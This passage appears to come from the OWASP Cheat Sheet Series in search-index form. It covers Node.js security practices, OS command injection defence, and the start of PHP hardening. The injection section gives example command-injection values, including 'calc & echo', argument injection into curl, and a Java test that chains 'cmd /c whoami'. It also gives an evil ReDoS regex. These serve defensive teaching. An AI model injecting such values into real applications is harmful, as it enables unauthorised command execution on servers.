Input validation is a crucial part of application security. Input validation failures can result in many types of application attacks. These include SQL Injection, Cross-Site Scripting, Command Injection, Local/Remote File Inclusion, Denial of Service, Directory Traversal, LDAP Injection and many other injection attacks. In order to avoid these attacks, input to your application should be sanitized first. The best input validation technique is to use a list of accepted inputs. However, if this is not possible, input should first be checked against the expected input schema and dangerous inputs should be escaped. In order to ease input validation in Node.js applications, there are modules such as validator and mongo-express-sanitize. For detailed information on input validation, please refer to the Input Validation Cheat Sheet.

JavaScript is a dynamic language and depending on how the framework parses a URL, the data seen by the application code can take many forms. Here are some examples after parsing a query string in express.js:

URL                         Content of request.query.foo in code
?foo=bar                    'bar' (string)
?foo=bar&foo=baz            ['bar', 'baz'] (array of string)
?foo[]=bar                  ['bar'] (array of string)
?foo[]=bar&foo[]=baz        ['bar', 'baz'] (array of string)
?foo[bar]=baz               { bar : 'baz' } (object with a key)
?foo[]=bar                  ['bar'] (array of string)
?foo[]baz=bar               ['bar'] (array of string - postfix is lost)
?foo[][baz]=bar             [ { baz: 'bar' } ] (array of object)
?foo[bar][baz]=bar          { foo: { bar: { baz: 'bar' } } } (object tree)
?foo[10]=bar&foo[9]=baz     [ 'baz', 'bar' ] (array of string - notice order)
?foo[toString]=bar          {} (object where calling toString() will fail)
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-output-escaping","title":"Perform output escaping","text":"

In addition to input validation, you should escape all HTML and JavaScript content shown to users via application in order to prevent cross-site scripting (XSS) attacks. You can use escape-html or node-esapi libraries to perform output escaping.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-application-activity-logging","title":"Perform application activity logging","text":"

Logging application activity is an encouraged good practice. It makes it easier to debug any errors encountered during application runtime. It is also useful for security concerns, since it can be used during incident response. In addition, these logs can be used to feed Intrusion Detection/Prevention Systems (IDS/IPS). In Node.js, there are modules such as Winston, Bunyan, or Pino to perform application activity logging. These modules enable streaming and querying logs, and they provide a way to handle uncaught exceptions.

With the following code, you can log application activities in both console and a desired log file:

const winston = require('winston');\n\nconst logger = new (winston.Logger) ({\ntransports: [\nnew (winston.transports.Console)(),\nnew (winston.transports.File)({ filename: 'application.log' })\n],\nlevel: 'verbose'\n});\n

You can provide different transports so that you can save errors to a separate log file and general application logs to a different log file. Additional information on security logging can be found in Logging Cheat Sheet.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#monitor-the-event-loop","title":"Monitor the event loop","text":"

When your application server is under heavy network traffic, it may not be able to serve its users. This is essentially a type of Denial of Service (DoS) attack. The toobusy-js module allows you to monitor the event loop. It keeps track of the response time, and when it goes beyond a certain threshold, this module can indicate that your server is too busy. In that case, you can stop processing incoming requests and send them a 503 Server Too Busy message so that your application stays responsive. Example use of the toobusy-js module is shown here:

const toobusy = require('toobusy-js');\nconst express = require('express');\nconst app = express();\napp.use(function(req, res, next) {\nif (toobusy()) {\n// log if you see necessary\nres.status(503).send(\"Server Too Busy\");\n} else {\nnext();\n}\n});\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#take-precautions-against-brute-forcing","title":"Take precautions against brute-forcing","text":"

Brute-forcing is a common threat to all web applications. Attackers can use brute-forcing as a password guessing attack to obtain account passwords. Therefore, application developers should take precautions against brute-force attacks, especially on login pages. Node.js has several modules available for this purpose. Express-bouncer, express-brute and rate-limiter are just some examples. Based on your needs and requirements, you should choose one or more of these modules and use them accordingly. The express-bouncer and express-brute modules work similarly: they increase the delay for each failed request and can be configured for a specific route. These modules can be used as follows:

const bouncer = require('express-bouncer');\nbouncer.whitelist.push('127.0.0.1'); // allow an IP address\n// give a custom error message\nbouncer.blocked = function (req, res, next, remaining) {\nres.status(429).send(\"Too many requests have been made. Please wait \" + remaining/1000 + \" seconds.\");\n};\n// route to protect\napp.post(\"/login\", bouncer.block, function(req, res) {\nif (LoginFailed){  }\nelse {\nbouncer.reset( req );\n}\n});\n
const ExpressBrute = require('express-brute');\n\nconst store = new ExpressBrute.MemoryStore(); // stores state locally, don't use this in production\nconst bruteforce = new ExpressBrute(store);\n\napp.post('/auth',\nbruteforce.prevent, // error 429 if we hit this route too often\nfunction (req, res, next) {\nres.send('Success!');\n}\n);\n

Apart from express-bouncer and express-brute, the rate-limiter module can also help to prevent brute-forcing attacks. It enables specifying how many requests a specific IP address can make during a specified time period.

const limiter = new RateLimiter();\nlimiter.addLimit('/login', 'GET', 5, 500); // login page can be requested 5 times at max within 500 seconds\n

CAPTCHA usage is another common mechanism used against brute-forcing. There are several CAPTCHA modules developed for Node.js. A common module used in Node.js applications is svg-captcha. It can be used as follows:

const svgCaptcha = require('svg-captcha');\napp.get('/captcha', function (req, res) {\nconst captcha = svgCaptcha.create();\nreq.session.captcha = captcha.text;\nres.type('svg');\nres.status(200).send(captcha.data);\n});\n

Account lockout is a recommended solution to keep attackers away from your valid users. Account lockout can be implemented with many modules, such as mongoose. You can refer to this blog post to see how account lockout is implemented with mongoose.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-anti-csrf-tokens","title":"Use Anti-CSRF tokens","text":"

Cross-Site Request Forgery (CSRF) aims to perform authorized actions on behalf of an authenticated user while the user is unaware of the action. CSRF attacks are generally performed for state-changing requests like changing a password, adding users or placing orders. Csurf is an Express middleware that was widely used to mitigate CSRF attacks. However, a security hole in this package was recently discovered. The team behind the package has not fixed the vulnerability and has marked the package as deprecated, recommending the use of any other CSRF protection package.

For detailed information on cross-site request forgery (CSRF) attacks and prevention methods, you can refer to Cross-Site Request Forgery Prevention.

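Because the deprecated csurf package should not be relied on, prefer a maintained CSRF protection package. Purely to illustrate the synchronizer token pattern (not a substitute for a vetted library), a session-bound token can be generated and verified with Node's built-in crypto module; the routes and the view name below are hypothetical and assume express-session is configured:

const crypto = require('crypto');\n\n// issue a per-session token and embed it in the form as a hidden field\napp.get('/form', function (req, res) {\nreq.session.csrfToken = crypto.randomBytes(32).toString('hex');\nres.render('form', { csrfToken: req.session.csrfToken });\n});\n\n// reject state-changing requests that do not echo the token back\napp.post('/transfer', function (req, res) {\nif (!req.body._csrf || req.body._csrf !== req.session.csrfToken) {\nreturn res.status(403).send('Invalid CSRF token');\n}\n// perform the state-changing action\nres.sendStatus(200);\n});\n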
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#remove-unnecessary-routes","title":"Remove unnecessary routes","text":"

A web application should not contain any page that is not used by users, as it may increase the attack surface of the application. Therefore, all unused API routes should be disabled in Node.js applications. This is especially important in frameworks like Sails and Feathers, as they automatically generate REST API endpoints. For example, in Sails, if a URL does not match a custom route, it may match one of the automatic routes and still generate a response. This situation may lead to results ranging from information leakage to arbitrary command execution. Therefore, before using such frameworks and modules, it is important to know which routes they automatically generate and to remove or disable them.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#prevent-http-parameter-pollution","title":"Prevent HTTP Parameter Pollution","text":"

HTTP Parameter Pollution (HPP) is an attack in which attackers send multiple HTTP parameters with the same name, causing your application to interpret them unpredictably. When multiple parameter values are sent, Express populates them in an array. In order to solve this issue, you can use the hpp module. When used, this module ignores all values submitted for a parameter in req.query and/or req.body and just selects the last parameter value submitted. You can use it as follows:

const hpp = require('hpp');\napp.use(hpp());\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#only-return-what-is-necessary","title":"Only return what is necessary","text":"

Information about the users of an application is among the most critical information about the application. User tables generally include fields like id, username, full name, email address, birth date, password and, in some cases, social security numbers. Therefore, when querying and using user objects, you should return only the fields that are needed, as returning complete objects may lead to personal information disclosure. This also applies to other objects stored in the database. If you just need a certain field of an object, you should only return the specific fields required. As an example, you can use a function like the following whenever you need to get information on a user. By doing so, you return only the fields that are needed for your specific operation. In other words, if you only need to list the names of the available users, you do not return their email addresses or credit card numbers in addition to their full names.

exports.sanitizeUser = function(user) {\nreturn {\nid: user.id,\nusername: user.username,\nfullName: user.fullName\n};\n};\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-object-property-descriptors","title":"Use object property descriptors","text":"

Object properties include three hidden attributes: writable (if false, the property value cannot be changed), enumerable (if false, the property cannot be used in for...in loops) and configurable (if false, the property cannot be deleted). When defining an object property through assignment, these three hidden attributes are set to true by default. These attributes can be set as follows:

const o = {};\nObject.defineProperty(o, \"a\", {\nwritable: true,\nenumerable: true,\nconfigurable: true,\nvalue: \"A\"\n});\n

Apart from these, there are some special functions for object attributes. Object.preventExtensions() prevents new properties from being added to the object.

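A short sketch of how Object.preventExtensions() changes object behavior (in strict mode the blocked operation throws instead of failing silently); the object and property names are made up:

'use strict';\n\nconst settings = { retries: 3 };\nObject.preventExtensions(settings);\n\nsettings.retries = 5;       // still allowed: the existing property is writable\n// settings.timeout = 1000; // TypeError in strict mode: the object is not extensible\n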
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-access-control-lists","title":"Use access control lists","text":"

Authorization prevents users from acting outside of their intended permissions. To achieve this, users and their roles should be determined with the principle of least privilege in mind. Each user role should only have access to the resources it must use. For your Node.js applications, you can use the acl module to provide an ACL (access control list) implementation. With this module, you can create roles and assign users to these roles.

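A rough sketch of how such roles might be wired up with the acl module; the method names follow that module's documented interface and should be verified against its current documentation, and the role, resource and user names are made up:

const Acl = require('acl');\nconst acl = new Acl(new Acl.memoryBackend());\n\n// each role only gets the resources and permissions it needs\nacl.allow('viewer', '/reports', 'get');\nacl.allow('editor', '/reports', ['get', 'put']);\n\n// assign a user to a role, then check permissions before serving the request\nacl.addUserRoles('user42', 'viewer');\nacl.isAllowed('user42', '/reports', 'get', function (err, allowed) {\nif (!allowed) {\n// respond with 403 Forbidden\n}\n});\n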
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#error-exception-handling","title":"Error & Exception Handling","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#handle-uncaughtexception","title":"Handle uncaughtException","text":"

Node.js' default behavior for uncaught exceptions is to print the current stack trace and then terminate the thread. However, Node.js allows customization of this behavior. It provides a global object named process that is available to all Node.js applications. It is an EventEmitter object, and in case of an uncaught exception, the uncaughtException event is emitted and brought up to the main event loop. In order to provide custom behavior for uncaught exceptions, you can bind to this event. However, resuming the application after such an uncaught exception can lead to further problems. Therefore, if you do not want to miss any uncaught exception, you should bind to the uncaughtException event and clean up any allocated resources (like file descriptors and handles) before shutting down the process. Resuming the application is strongly discouraged, as the application will be in an unknown state. It is important to note that when displaying error messages to the user in case of an uncaught exception, detailed information like stack traces should not be revealed. Instead, custom error messages should be shown to users in order not to cause any information leakage.

process.on(\"uncaughtException\", function(err) {\n// clean up allocated resources\n// log necessary error details to log files\nprocess.exit(); // exit the process to avoid unknown state\n});\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#listen-to-errors-when-using-eventemitter","title":"Listen to errors when using EventEmitter","text":"

When using EventEmitter, errors can occur anywhere in the event chain. Normally, if an error occurs in an EventEmitter object, an error event is emitted with an Error object as an argument. However, if there are no listeners attached to that error event, the Error object that is sent as an argument is thrown and becomes an uncaught exception. In short, if you do not handle errors within an EventEmitter object properly, these unhandled errors may crash your application. Therefore, you should always listen to error events when using EventEmitter objects.

const events = require('events');\nconst myEventEmitter = function(){\nevents.EventEmitter.call(this);\n}\nrequire('util').inherits(myEventEmitter, events.EventEmitter);\nmyEventEmitter.prototype.someFunction = function(param1, param2) {\n//in case of an error\nthis.emit('error', err);\n}\nconst emitter = new myEventEmitter();\nemitter.on('error', function(err){\n//Perform necessary error handling here\n});\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#handle-errors-in-asynchronous-calls","title":"Handle errors in asynchronous calls","text":"

Errors that occur within asynchronous callbacks are easy to miss. Therefore, as a general principle, the first argument to asynchronous callbacks should be an Error object (the error-first callback convention). Also, Express routes handle errors themselves, but it should always be remembered that errors occurring in asynchronous calls made within Express routes are not handled unless the Error object is passed as an argument to the next() function.

Errors in these callbacks can be propagated through as many callbacks as needed. Each callback that the error has been propagated to can ignore, handle or propagate the error.

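A minimal sketch of both conventions: an error-first callback, and forwarding an asynchronous error to Express's error-handling middleware via next(). The file path and route are hypothetical.

const fs = require('fs');\n\n// error-first callback: always check the Error argument before using the data\nfs.readFile('/path/to/config.json', 'utf8', function (err, data) {\nif (err) {\n// handle or propagate the error; do not silently ignore it\nreturn console.error(err);\n}\nconsole.log(data);\n});\n\n// inside an Express route, pass asynchronous errors to next() so the error middleware runs\napp.get('/config', function (req, res, next) {\nfs.readFile('/path/to/config.json', 'utf8', function (err, data) {\nif (err) {\nreturn next(err);\n}\nres.send(data);\n});\n});\n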
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#server-security","title":"Server Security","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately","title":"Set cookie flags appropriately","text":"

Generally, session information is sent using cookies in web applications. However, improper use of HTTP cookies can make an application vulnerable to several session management attacks. Certain flags can be set for each cookie to prevent these kinds of attacks. The httpOnly, Secure and SameSite flags are very important for session cookies. The httpOnly flag prevents the cookie from being accessed by client-side JavaScript, which is an effective countermeasure against XSS attacks. The Secure flag ensures the cookie is sent only if the communication is over HTTPS. The SameSite flag can prevent cookies from being sent in cross-site requests, which helps protect against Cross-Site Request Forgery (CSRF) attacks. Apart from these, there are other flags like domain, path and expires. Setting these flags appropriately is encouraged, but they are mostly related to cookie scope rather than cookie security. Sample usage of these flags is given in the following example:

const session = require('express-session');\napp.use(session({\nsecret: 'your-secret-key',\nname: 'cookieName',\ncookie: { secure: true, httpOnly: true, path: '/user', sameSite: true}\n}));\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-appropriate-security-headers","title":"Use appropriate security headers","text":"

There are several HTTP security headers that can help you prevent some common attack vectors. The helmet package can help to set those headers:

const express = require(\"express\");\nconst helmet = require(\"helmet\");\n\nconst app = express();\n\napp.use(helmet()); // Add various HTTP headers\n

The top-level helmet function is a wrapper around 14 smaller middlewares. Below is a list of HTTP security headers covered by helmet middlewares:

app.use(helmet.hsts()); // default configuration\napp.use(\nhelmet.hsts({\nmaxAge: 123456,\nincludeSubDomains: false,\n})\n); // custom configuration\n
app.use(helmet.frameguard()); // default behavior (SAMEORIGIN)\n
app.use(helmet.xssFilter()); // sets \"X-XSS-Protection: 0\"\n

For modern browsers, it is recommended to implement a strong Content-Security-Policy, as detailed in the next section.

app.use(\nhelmet.contentSecurityPolicy({\n// the following directives will be merged into the default helmet CSP policy\ndirectives: {\ndefaultSrc: [\"'self'\"],  // default value for all directives that are absent\nscriptSrc: [\"'self'\"],   // helps prevent XSS attacks\nframeAncestors: [\"'none'\"],  // helps prevent Clickjacking attacks\nimgSrc: [\"'self'\", \"'http://imgexample.com'\"],\nstyleSrc: [\"'none'\"]\n}\n})\n);\n

As this middleware performs very little validation, it is recommended to rely on CSP checkers like CSP Evaluator instead.

app.use(helmet.noSniff());\n
const nocache = require(\"nocache\");\n\napp.use(nocache());\n

The above code sets Cache-Control, Surrogate-Control, Pragma and Expires headers accordingly.

app.use(helmet.ieNoOpen());\n
const expectCt = require('expect-ct');\napp.use(expectCt({ maxAge: 123 }));\napp.use(expectCt({ enforce: true, maxAge: 123 }));\napp.use(expectCt({ enforce: true, maxAge: 123, reportUri: 'http://example.com'}));\n
app.use(helmet.hidePoweredBy());\n

Also, you can use this header to lie about the technologies in use. For example, even if your application does not use PHP, you can set the X-Powered-By header to make it seem so.

app.use(helmet.hidePoweredBy({ setTo: 'PHP 4.2.0' }));\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#platform-security","title":"Platform Security","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#keep-your-packages-up-to-date","title":"Keep your packages up-to-date","text":"

The security of your application depends directly on how secure the third-party packages you use in your application are. Therefore, it is important to keep your packages up-to-date. It should be noted that Using Components with Known Vulnerabilities is still in the OWASP Top 10. You can use OWASP Dependency-Check to see if any of the packages used in the project have known vulnerabilities. You can also use Retire.js to check JavaScript libraries with known vulnerabilities.

Starting with version 6, npm introduced audit, which will warn about vulnerable packages:

npm audit\n

npm also introduced a simple way to upgrade the affected packages:

npm audit fix\n

There are several other tools you can use to check your dependencies. A more comprehensive list can be found in Vulnerable Dependency Management CS.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#do-not-use-dangerous-functions","title":"Do not use dangerous functions","text":"

There are some JavaScript functions that are dangerous and should only be used where necessary or unavoidable. The first example is the eval() function. This function takes a string argument and executes it as any other JavaScript source code. Combined with user input, this behavior inherently leads to a remote code execution vulnerability. Similarly, calls to child_process.exec are also very dangerous. This function spawns a shell and passes its arguments to /bin/sh for interpretation. By injecting input to this function, attackers can execute arbitrary commands on the server.

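As an illustration of the difference, child_process.exec runs its argument string through a shell, while child_process.execFile passes arguments directly to the program without shell interpretation. The directory value below stands in for attacker-controlled input.

const { exec, execFile } = require('child_process');\n\nconst userDir = '/tmp'; // imagine this value comes from user input\n\n// DANGEROUS: the whole string is interpreted by /bin/sh, so shell metacharacters in userDir are executed\nexec('ls -l ' + userDir, function (err, stdout) { /* ... */ });\n\n// SAFER: arguments are passed directly to the binary, with no shell metacharacter interpretation\nexecFile('ls', ['-l', userDir], function (err, stdout) { /* ... */ });\n
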
In addition to these functions, some modules require special care when being used. As an example, the fs module handles filesystem operations. However, if improperly sanitized user input is fed into this module, your application may become vulnerable to file inclusion and directory traversal vulnerabilities. Similarly, the vm module provides APIs for compiling and running code within V8 Virtual Machine contexts. Since it can perform dangerous actions by nature, it should be used within a sandbox.

It would not be fair to say that these functions and modules should never be used; however, they should be used carefully, especially when they are used with user input. Also, there are some other functions that may render your application vulnerable.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#stay-away-from-evil-regexes","title":"Stay away from evil regexes","text":"

The Regular expression Denial of Service (ReDoS) is a Denial of Service attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time.

Some Regular Expression (regex) implementations can reach extreme situations that make the application very slow. Attackers can use such regexes to force an application into these extreme situations and make it hang for a long time. Such regexes are called evil if an application can get stuck on crafted input. Generally, these regexes are exploited through grouping with repetition and alternation with overlapping. For example, the regular expression ^(([a-z])+.)+[A-Z]([a-z])+$ can be used to specify Java class names. However, a very long string (aaaa...aaaaAaaaaa...aaaa) can also be matched against this regular expression, taking a very long time to evaluate. There are some tools to check if a regex has the potential for causing denial of service. One example is vuln-regex-detector.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#run-security-linters","title":"Run security linters","text":"

When developing code, keeping all security tips in mind can be really difficult. Also, making all team members obey these rules is nearly impossible. This is why there are Static Analysis Security Testing (SAST) tools. These tools do not execute your code; they simply look for patterns that can contain security risks. As JavaScript is a dynamic and loosely-typed language, linting tools are really essential in the software development life cycle. The linting rules should be reviewed periodically and the findings should be audited. Another advantage of these tools is that you can add custom rules for patterns that you consider dangerous. ESLint and JSHint are commonly used SAST tools for JavaScript linting.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-strict-mode","title":"Use strict mode","text":"

JavaScript has a number of unsafe and dangerous legacy features that should not be used. In order to remove these features, ES5 included a strict mode for developers. With this mode, errors that were previously silent are thrown. It also helps JavaScript engines perform optimizations. With strict mode, previously accepted bad syntax causes real errors. Because of these improvements, you should always use strict mode in your application. In order to enable strict mode, you just need to write \"use strict\"; at the top of your code.

The following code will generate a ReferenceError: Can't find variable: y on the console, which will not be displayed unless strict mode is used:

\"use strict\";\n\nfunc();\nfunction func() {\ny = 3.14;   // This will cause an error (y is not defined)\n}\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#adhere-to-general-application-security-principles","title":"Adhere to general application security principles","text":"

This list mainly focuses on issues that are common in Node.js applications, with recommendations and examples. In addition to these, there are general security-by-design principles that apply to web applications regardless of the technologies used in the application server. You should also keep those principles in mind while developing your applications. You can always refer to the OWASP Cheat Sheet Series to learn more about web application vulnerabilities and the mitigation techniques used against them.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#additional-resources-about-nodejs-security","title":"Additional resources about Node.js security","text":"

Awesome Node.js Security resources

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html","title":"OS Command Injection Defense Cheat Sheet","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Command injection (or OS Command Injection) is a type of injection where software that constructs a system command using externally influenced input does not correctly neutralize the input from special elements that can modify the initially intended command.

For example, if the supplied value is:

calc\n

when typed in a Windows command prompt, the application Calculator is displayed.

However, if the supplied value has been tampered with, and now it is:

calc & echo \"test\"\n

when executed, it changes the meaning of the initial intended value.

Now, both the Calculator application and the value test are displayed.

The problem is exacerbated if the compromised process does not follow the principle of least privilege and attacker-controlled commands end up running with special system privileges that increase the amount of damage.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#argument-injection","title":"Argument Injection","text":"

Every OS Command Injection is also an Argument Injection. In this type of attack, user input can be passed as arguments while executing a specific command.

For example, if the user input is passed through an escape function to escape certain characters like &, |, ;, etc.

system(\"curl \" . escape($url));\n

this will prevent an attacker from running other commands.

However, if the attacker-controlled string contains an additional argument for the curl command:

system(\"curl \" . escape(\"--help\"))\n

Now when the above code is executed, it will show the output of curl --help.

Depending upon the system command used, the impact of an Argument injection attack can range from Information Disclosure to critical Remote Code Execution.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#primary-defenses","title":"Primary Defenses","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#defense-option-1-avoid-calling-os-commands-directly","title":"Defense Option 1: Avoid calling OS commands directly","text":"

The primary defense is to avoid calling OS commands directly. Built-in library functions are a very good alternative to OS commands, as they cannot be manipulated to perform tasks other than those they are intended to perform.

For example use mkdir() instead of system(\"mkdir /dir_name\").

If there are available libraries or APIs for the language you use, this is the preferred method.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#defense-option-2-escape-values-added-to-os-commands-specific-to-each-os","title":"Defense option 2: Escape values added to OS commands specific to each OS","text":"

TODO: To enhance.

For examples, see escapeshellarg() in PHP.

The escapeshellarg() surrounds the user input in single quotes, so if the malformed user input is something like & echo \"hello\", the final output will be like calc '& echo \"hello\"' which will be parsed as a single argument to the command calc.

Even though escapeshellarg() prevents OS Command Injection, an attacker can still pass a single argument to the command.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#defense-option-3-parameterization-in-conjunction-with-input-validation","title":"Defense option 3: Parameterization in conjunction with Input Validation","text":"

If calling a system command that incorporates user-supplied data cannot be avoided, the following two layers of defense should be used within software to prevent attacks:

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#layer-1","title":"Layer 1","text":"

Parameterization: If available, use structured mechanisms that automatically enforce the separation between data and command. These mechanisms can help provide the relevant quoting and encoding.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#layer-2","title":"Layer 2","text":"

Input validation: the values for commands and the relevant arguments should both be validated. There are different degrees of validation for the actual command and its arguments:

Note A:

& |  ; $ > < ` \\ ! ' \" ( )\n
"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#additional-defenses","title":"Additional Defenses","text":"

On top of primary defenses, parameterizations, and input validation, we also recommend adopting all of these additional defenses to provide defense in depth.

These additional defenses are:

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#code-examples","title":"Code examples","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#java","title":"Java","text":"

In Java, use ProcessBuilder, and the command must be separated from its arguments.

Note about the Java's Runtime.exec method behavior:

There are many sites that will tell you that Java's Runtime.exec is exactly the same as C's system function. This is not true. Both allow you to invoke a new program/process.

However, C's system function passes its arguments to the shell (/bin/sh) to be parsed, whereas Runtime.exec tries to split the string into an array of words, then executes the first word in the array with the rest of the words as parameters.

Runtime.exec does NOT try to invoke the shell at any point and does not support shell metacharacters.

The key difference is that much of the functionality provided by the shell that could be used for mischief (chaining commands using &, &&, |, ||, etc, redirecting input and output) would simply end up as a parameter being passed to the first command, likely causing a syntax error or being thrown out as an invalid parameter.

Code to test the note above:

String[] specialChars = new String[]{\"&\", \"&&\", \"|\", \"||\"};\nString payload = \"cmd /c whoami\";\nString cmdTemplate = \"java -version %s \" + payload;\nString cmd;\nProcess p;\nint returnCode;\nfor (String specialChar : specialChars) {\ncmd = String.format(cmdTemplate, specialChar);\nSystem.out.printf(\"#### TEST CMD: %s\\n\", cmd);\np = Runtime.getRuntime().exec(cmd);\nreturnCode = p.waitFor();\nSystem.out.printf(\"RC    : %s\\n\", returnCode);\nSystem.out.printf(\"OUT   :\\n%s\\n\", IOUtils.toString(p.getInputStream(),\n\"utf-8\"));\nSystem.out.printf(\"ERROR :\\n%s\\n\", IOUtils.toString(p.getErrorStream(),\n\"utf-8\"));\n}\nSystem.out.printf(\"#### TEST PAYLOAD ONLY: %s\\n\", payload);\np = Runtime.getRuntime().exec(payload);\nreturnCode = p.waitFor();\nSystem.out.printf(\"RC    : %s\\n\", returnCode);\nSystem.out.printf(\"OUT   :\\n%s\\n\", IOUtils.toString(p.getInputStream(),\n\"utf-8\"));\nSystem.out.printf(\"ERROR :\\n%s\\n\", IOUtils.toString(p.getErrorStream(),\n\"utf-8\"));\n

Result of the test:

##### TEST CMD: java -version & cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST CMD: java -version && cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST CMD: java -version | cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST CMD: java -version || cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST PAYLOAD ONLY: cmd /c whoami\nRC    : 0\nOUT   :\nmydomain\\simpleuser\n\nERROR :\n

Incorrect usage:

ProcessBuilder b = new ProcessBuilder(\"C:\\DoStuff.exe -arg1 -arg2\");\n

In this example, the command together with the arguments is passed as one string, making it easy to manipulate that expression and inject malicious strings.

Correct Usage:

Here is an example that starts a process with a modified working directory. The command and each of the arguments are passed separately. This makes it easy to validate each term and reduces the risk of malicious strings being inserted.

ProcessBuilder pb = new ProcessBuilder(\"TrustedCmd\", \"TrustedArg1\", \"TrustedArg2\");\n\nMap<String, String> env = pb.environment();\n\npb.directory(new File(\"TrustedDir\"));\n\nProcess p = pb.start();\n
"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#net","title":".Net","text":"

See relevant details in the DotNet Security Cheat Sheet

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#php","title":"PHP","text":"

In PHP use escapeshellarg() or escapeshellcmd() rather than exec(), system(), passthru().

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#related-articles","title":"Related articles","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#description-of-command-injection-vulnerability","title":"Description of Command Injection Vulnerability","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#how-to-avoid-vulnerabilities","title":"How to Avoid Vulnerabilities","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#how-to-review-code","title":"How to Review Code","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#how-to-test","title":"How to Test","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#external-references","title":"External References","text":""},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html","title":"PHP Configuration Cheat Sheet","text":""},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This page is meant to help those configuring PHP and the web server it is running on to be very secure.

Below you will find information on the proper settings for the php.ini file and instructions on configuring Apache, Nginx, and Caddy web servers.

For general PHP codebase security please refer to the two following great guides:

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-configuration-and-deployment","title":"PHP Configuration and Deployment","text":""},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#phpini","title":"php.ini","text":"

Some of the following settings need to be adapted to your system, in particular session.save_path, session.cookie_path (e.g. /var/www/mysite), and session.cookie_domain (e.g. ExampleSite.com).

You should also be running PHP 7.2 or later. If running PHP 7.0 or 7.1, you will use slightly different values in a couple of places below (see inline comments). Finally, look through the PHP Manual for a complete reference on every value in the php.ini configuration file.

You can find a copy of the following values in a ready-to-go php.ini file here.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-error-handling","title":"PHP error handling","text":"
expose_php              = Off\nerror_reporting         = E_ALL\ndisplay_errors          = Off\ndisplay_startup_errors  = Off\nlog_errors              = On\nerror_log               = /valid_path/PHP-logs/php_error.log\nignore_repeated_errors  = Off\n

Keep in mind that you need to have display_errors set to Off on a production server, and it is a good idea to review the logs frequently.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-general-settings","title":"PHP general settings","text":"
